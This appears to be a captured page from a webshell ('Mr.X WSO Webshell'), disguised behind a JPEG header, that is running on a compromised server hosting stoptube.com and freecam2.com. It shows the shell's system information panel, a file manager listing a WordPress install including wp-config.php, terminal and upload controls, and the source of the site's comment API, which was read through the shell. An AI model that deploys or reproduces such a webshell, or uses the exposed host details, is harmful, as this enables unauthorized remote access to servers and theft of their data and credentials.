����JFIF���������www.stoptube.com - WSOX ENC
Attention:
Uname:
Php:
Hdd:
Cwd:		Mr.X WSO Webshell! - Personal WEB SHELL Mr.X BYPASS! V2.5 Telegram: @jackleet
Linux msm5694.mjhst.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
5.3.29 Safe mode: OFF Datetime: 2026-04-09 08:39:39
1999.30 GB Free: 74.72 GB (3%)
/home/httpd/html/stoptube.com/ drwxr-xr-x [ root ] [ home ] Text

Server IP:
127.0.0.54
Client IP:
216.73.216.53
[ Files ][ Logout ]

File manager

NameSizeModifyPermissionsActions
[ . ]dir2020-10-29 21:25:34drwxr-xr-xRename Touch
[ .. ]dir2026-04-09 08:35:45drwxr-xr-xRename Touch
[ cgi-bin ]dir2012-04-08 21:15:31drwxr-xr-xRename Touch
[ public_html ]dir2023-11-10 01:29:28drwxr-xr-xRename Touch
[ stats ]dir2012-05-18 05:35:08drwxr-xr-xRename Touch
[ wp-admin ]dir2018-10-17 02:02:36drwxr-xr-xRename Touch
[ wp-content ]dir2026-04-09 08:15:43drwxrwxr-xRename Touch
[ wp-includes ]dir2018-10-17 02:02:35drwxrwxr-xRename Touch
[ wpbackup-mojo ]dir2013-09-23 12:20:27drwxr-xr-xRename Touch
120x240_2.gif13.45 KB2008-06-28 03:13:23-rw-r--r--Rename Touch Edit Download
120x240_4.gif11.19 KB2008-06-28 03:15:01-rw-r--r--Rename Touch Edit Download
google33e705b4a02b516c.html53 B2018-10-09 07:59:06-rw-r--r--Rename Touch Edit Download
google54c2bf32c9bf2083.html7 B2009-05-30 01:17:01-rw-r--r--Rename Touch Edit Download
grepsearch.php910 B2009-05-31 03:50:51-rw-r--r--Rename Touch Edit Download
index.php418 B2018-10-17 02:00:34-rw-r--r--Rename Touch Edit Download
license.txt19.47 KB2018-10-17 02:00:34-rw-r--r--Rename Touch Edit Download
readme.html7.24 KB2020-10-29 21:25:34-rw-r--r--Rename Touch Edit Download
robots.txt29 B2014-04-01 00:38:43-rw-r--r--Rename Touch Edit Download
scan_files.php3.34 KB2009-06-03 20:33:08-rw-r--r--Rename Touch Edit Download
wp-activate.php6.72 KB2018-12-13 02:57:59-rw-r--r--Rename Touch Edit Download
wp-atom.php226 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-blog-header.php364 B2018-10-17 02:02:31-rw-r--r--Rename Touch Edit Download
wp-comments-post.php1.84 KB2018-10-17 02:02:31-rw-r--r--Rename Touch Edit Download
wp-commentsrss2.php244 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-config-sample.php2.79 KB2018-10-17 02:02:31-rw-r--r--Rename Touch Edit Download
wp-config.php1.47 KB2018-10-04 12:51:18-rw-rw-r--Rename Touch Edit Download
wp-config.php_backup_ticket_5246641.30 KB2018-10-03 15:00:12-rw-r--r--Rename Touch Edit Download
wp-cron.php3.58 KB2018-10-17 02:02:31-rw-r--r--Rename Touch Edit Download
wp-feed.php246 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-links-opml.php2.37 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-load.php3.23 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-login.php36.92 KB2018-12-13 02:57:59-rw-r--r--Rename Touch Edit Download
wp-mail.php7.86 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-pass.php494 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-rdf.php224 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-register.php334 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-rss.php224 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-rss2.php226 B2010-12-09 18:02:54-rw-r--r--Rename Touch Edit Download
wp-settings.php15.87 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-signup.php29.39 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wp-trackback.php4.51 KB2018-10-17 02:02:34-rw-r--r--Rename Touch Edit Download
wpupdate.sh12.75 KB2013-09-22 17:09:27-rw-r--r--Rename Touch Edit Download
xmlrpc.php2.99 KB2018-10-17 02:02:34----------Rename Touch Edit Download
 
Change dir:
Read file:
Make dir: (Not writable)
Make file: (Not writable)
Terminal:
Upload file: (Not writable)

HEX
HEX
Server: Apache
System: Linux msm5694.mjhst.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User: camjab_ssh (1000)
PHP: 5.3.29
Disabled: NONE
$ pwd: /home/httpd/html/freecam2.com/public_html/includes/
Upload Files
File: /home/httpd/html/freecam2.com/public_html/includes/api.comments.php
<?php
session_start();
include '../admin/db.php';

$action = $_REQUEST['action'];
$res = array();

switch ($action) {
    case 'add-comment':
        $performer_name = mysqli_real_escape_string($dblink, $_REQUEST['performer_name']);
        $performer_site = (int) $_REQUEST['performer_site'];
        $comment = str_replace(array('"',"'"), array('&#8221;','&#8217;'), $_REQUEST['comment']);
        $comment = strip_tags(mysqli_real_escape_string($dblink, $comment));
        $parent = (int) $_REQUEST['parent'];
        
        if($_SESSION['userid']){
            
            if($comment == ''){
                $res['status'] = 'error';
                $res['info'] = "The comment field is empty. Please write a comment.";
            }
            
            if($res['status'] != 'error'){
                if(strlen($comment) > $max_comment_lenght){
                    $res['status'] = 'error';
                    $res['info'] = "The maximum length of a comment is $max_comment_lenght.";
                }
            }
            
            if($res['status'] != 'error'){
                $now = time() - 60;
                $throttle = dbQuery("SELECT record_num FROM comments WHERE performer_name = '$performer_name' AND performer_site = '$performer_site' AND userid = '{$_SESSION['userid']}' AND timestamp > '$now'",false);
                $throttle = (is_array($throttle)) ? $throttle : array();
                if(count($throttle) > 0) {
                    $res['status'] = 'error';
                    $res['info'] = "You may only post a comment once every 60 seconds.";
                }
            }

            if($res['status'] != 'error'){
                $checkPerformer = dbQuery("SELECT username FROM performers WHERE username = '$performer_name' AND site = '$performer_site'", false);
                if(is_array($checkPerformer)){
                    mysqli_query($dblink, "INSERT INTO comments SET userid = '{$_SESSION['userid']}', name = '{$_SESSION['username']}', comment = '$comment', performer_name = '$performer_name', performer_site = '$performer_site', timestamp = '".time()."', ip = '".$_SERVER['REMOTE_ADDR']."', parent = '$parent'");
                    
                    $res['status'] = 'success';
                    $res['info'] = "Comment added.";
                    
                    $insert_id = mysqli_insert_id($dblink);
                    $res['status'] = 'success';
                    $res['info'] = "Comment added.";
                    $res['result'] = array(
                        'id' => $insert_id,
                        'username' => $_SESSION['username'],
                        'dateAdded' => 'Now',
                        'comment' => $comment
                    );
                } else {
                    $res['status'] = 'error';
                    $res['info'] = "The specified performer does not exist.";    
                }
            }
        } else {
            $res['status'] = 'error';
            $res['info'] = "Commenting available only for logged in users.";    
        }
    break;

    case 'edit-comment':
        $comment_id = (int) $_REQUEST['comment_id'];
        $comment = str_replace(array('"',"'"), array('&#8221;','&#8217;'), $_REQUEST['comment']);
        $comment = strip_tags(mysqli_real_escape_string($dblink, $comment));
        if(!$_SESSION['userid']){
            $res['status'] = 'error';
            $res['info'] = "Unauthorized!"; 
        }
        
        if($res['status'] != 'error'){
            if(strlen($comment) > $max_comment_lenght){
                $res['status'] = 'error';
                $res['info'] = "The maximum length of a comment is $max_comment_lenght.";
            }
        }
        
        if($res['status'] != 'error'){
            $checkComment = dbQuery("SELECT record_num FROM comments WHERE userid = '{$_SESSION['userid']}' AND record_num = '$comment_id'", false);
            $checkComment = (is_array($checkComment)) ? $checkComment : array();
            if(count($checkComment) > 0){
                dbQuery("UPDATE comments SET comment = '$comment' WHERE userid = '{$_SESSION['userid']}' AND record_num = '$comment_id'", false);
                $res['status'] = 'success';
                $res['info'] = "Comment updated."; 
                $res['comment'] = $comment;
            } else {
                $res['status'] = 'error';
                $res['info'] = "Unauthorized!"; 
            }
        }
    break;
    
    case 'reply-comment':
        $performer_name = mysqli_real_escape_string($dblink, $_REQUEST['performer_name']);
        $performer_site = (int) $_REQUEST['performer_site'];
        $comment = str_replace(array('"',"'"), array('&#8221;','&#8217;'), $_REQUEST['comment']);
        $comment = strip_tags(mysqli_real_escape_string($dblink, $comment));
        $parent = (int) $_REQUEST['parent'];
        
        if(!$_SESSION['userid']){
            $res['status'] = 'error';
            $res['info'] = "Unauthorized!"; 
        }
        
        if($res['status'] != 'error'){
            if($comment == ''){
                $res['status'] = 'error';
                $res['info'] = "The comment field is empty. Please write a comment.";
            }
            
            if($res['status'] != 'error'){
                if(strlen($comment) > $max_comment_lenght){
                    $res['status'] = 'error';
                    $res['info'] = "The maximum length of a comment is $max_comment_lenght.";
                }
            }
            
            if($res['status'] != 'error'){
                $now = time() - 60;
                $throttle = dbQuery("SELECT record_num FROM comments WHERE performer_name = '$performer_name' AND performer_site = '$performer_site' AND userid = '{$_SESSION['userid']}' AND timestamp > '$now'",false);
                $throttle = (is_array($throttle)) ? $throttle : array();
                if(count($throttle) > 0) {
                    $res['status'] = 'error';
                    $res['info'] = "You may only post a comment once every 60 seconds.";
                }
            }
            
            if($res['status'] != 'error'){
                $checkPerformer = dbQuery("SELECT username FROM performers WHERE username = '$performer_name' AND site = '$performer_site'", false);
                $checkCommentParent = dbQuery("SELECT record_num FROM comments WHERE performer_name = '$performer_name' AND performer_site = '$performer_site' AND record_num = '$parent'", false);
                if(is_array($checkPerformer) && is_array($checkCommentParent)){
                    mysqli_query($dblink, "INSERT INTO comments SET userid = '{$_SESSION['userid']}', name = '{$_SESSION['username']}', comment = '$comment', performer_name = '$performer_name', performer_site = '$performer_site', timestamp = '".time()."', ip = '".$_SERVER['REMOTE_ADDR']."', parent = '$parent'");
                    
                    $res['status'] = 'success';
                    $res['info'] = "Comment added.";
                    
                    $insert_id = mysqli_insert_id($dblink);
                    $res['status'] = 'success';
                    $res['info'] = "Comment added.";
                    $res['result'] = array(
                        'id' => $insert_id,
                        'username' => $_SESSION['username'],
                        'dateAdded' => 'Now',
                        'comment' => $comment
                    );
                } else {
                    $res['status'] = 'error';
                    $res['info'] = "The specified performer does not exist.";    
                }
            }
        }
    break;

    case 'vote-comment':
        if(!is_numeric($_REQUEST['comment_id'])){
            $res['status'] = 'error';
            $res['info'] = "Invalid comment id.";
        }
        
        if($res['status'] != 'error'){
            $comment_id = (int) ($_REQUEST['comment_id']);
            $checkVoted = dbQuery("SELECT comment_id FROM comments_likes WHERE comment_id = '$comment_id' AND ip = '{$_SERVER['REMOTE_ADDR']}'", false);
            $checkVoted = (is_array($checkVoted)) ? $checkVoted : array();
            if(count($checkVoted) > 0){
                dbQuery("DELETE FROM comments_likes WHERE comment_id = '$comment_id' AND ip = '{$_SERVER['REMOTE_ADDR']}'", false);
                $res['status'] = 'removed';
            } else {
                dbQuery("INSERT INTO comments_likes SET comment_id = '$comment_id', ip = '{$_SERVER['REMOTE_ADDR']}'", false);
                $res['status'] = 'added';
            }
        }
    break;

    case 'remove-comment':
        $comment_id = (int) ($_REQUEST['comment_id']);
        if(!$_SESSION['userid']){
            $res['status'] = 'error';
            $res['info'] = "Unauthorized!"; 
        }
        if($res['status'] != 'error'){
            $checkComment = dbQuery("SELECT record_num FROM comments WHERE userid = '{$_SESSION['userid']}' AND record_num = '$comment_id'", false);
            $checkComment = (is_array($checkComment)) ? $checkComment : array();
            if(count($checkComment) > 0){
                dbQuery("DELETE FROM comments WHERE userid = '{$_SESSION['userid']}' AND record_num = '$comment_id'", false);
                dbQuery("DELETE FROM comments WHERE parent = '$comment_id'", false);
                dbQuery("DELETE FROM comments_likes WHERE comment_id = '$comment_id'", false);
                $res['status'] = 'success';
                $res['info'] = "Comment removed."; 
            } else {
                $res['status'] = 'error';
                $res['info'] = "Unauthorized!"; 
            }
        }
    break;

    case 'get-comments':
        $performer_name = mysqli_real_escape_string($dblink, $_REQUEST['performer_name']);
        $performer_site = (int) $_REQUEST['performer_site'];
        $from = (int) $_REQUEST['from'];
        $limit = (int) $_REQUEST['limit'];
        $sortby = mysqli_real_escape_string($dblink, $_REQUEST['sort']);
        if($sortby == 'newest'){
            $andOrder = " ORDER BY timestamp DESC ";
        } elseif($sortby == 'oldest'){
            $andOrder = " ORDER BY timestamp ASC ";
        } elseif($sortby == 'popular'){
            $andOrder = " ORDER BY likes DESC ";
        } else {
            $andOrder = " ORDER BY timestamp DESC ";
        }
        
        $total_results = dbRow("SELECT COUNT(record_num) AS amount FROM comments WHERE performer_name = '$performer_name' AND performer_site = '$performer_site' AND parent = '0'", false);
        $total_results = $total_results['amount'];
        $results = dbQuery("SELECT comments.*, (SELECT COUNT(comment_id) FROM comments_likes WHERE comments_likes.comment_id = comments.record_num) AS likes FROM comments WHERE performer_name = '$performer_name' AND performer_site = '$performer_site' AND parent = '0' $andOrder LIMIT $from, $limit", false);
        $results = (is_array($results)) ? $results : array();
        if(count($results) > 0){
            
            $items = array();
            foreach ($results as $item) {
                $item['added'] = datediff('n',$item['timestamp'],time(),true).' ago';
                if($_SESSION['userid'] && $_SESSION['userid'] == $item['userid']){
                    $item['owner'] = 1;
                } else {
                    $item['owner'] = 0;
                }
                
                if($_SESSION['userid']){
                    $item['show_reply'] = true;
                } else {
                    $item['show_reply'] = false;
                }
                
                $replies_arr = array();
                
                $replies = dbQuery("SELECT comments.*, (SELECT COUNT(comment_id) FROM comments_likes WHERE comments_likes.comment_id = comments.record_num) AS likes FROM comments WHERE performer_name = '$performer_name' AND performer_site = '$performer_site' AND parent = '{$item['record_num']}' ORDER BY timestamp DESC", false);
                $replies = (is_array($replies)) ? $replies : array();
                foreach ($replies as $reply) {
                    $reply['added'] = datediff('n',$reply['timestamp'],time(),true).' ago';
                    if($_SESSION['userid'] && $_SESSION['userid'] == $reply['userid']){
                        $reply['owner'] = 1;
                    } else {
                        $reply['owner'] = 0;
                    }

                    if($_SESSION['userid']){
                        $reply['show_reply'] = true;
                    } else {
                        $reply['show_reply'] = false;
                    }
                    $replies_arr[] = $reply;
                }
                
                $item['replies'] = $replies_arr;
                        
                $items[] = $item;
            }
            $res['status'] = 'success';
            $res['total_results'] = $total_results;
            $res['results'] = $items;
        } else {
            $res['status'] = 'success';
            $res['info'] = 'No comments where found.';
            $res['total_results'] = 0;
            $res['results'] = false;
        }
        
    break;

    default:
        $res['status'] = 'error';
        $res['info'] = 'Unknown command.';
    break;
}

echo json_encode($res);
exit();

?>
@ Telegram